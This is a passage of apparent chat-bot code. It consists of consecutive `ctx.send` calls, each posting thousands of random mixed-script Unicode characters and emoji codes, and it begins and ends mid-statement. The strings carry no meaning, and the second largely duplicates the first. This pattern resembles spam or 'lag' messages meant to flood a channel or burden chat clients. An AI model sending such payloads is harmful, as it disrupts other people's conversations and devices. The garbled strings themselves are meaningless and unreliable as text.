ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭ⏆ष᳼༊") await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭȝᙖ:") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന₹࢝") await 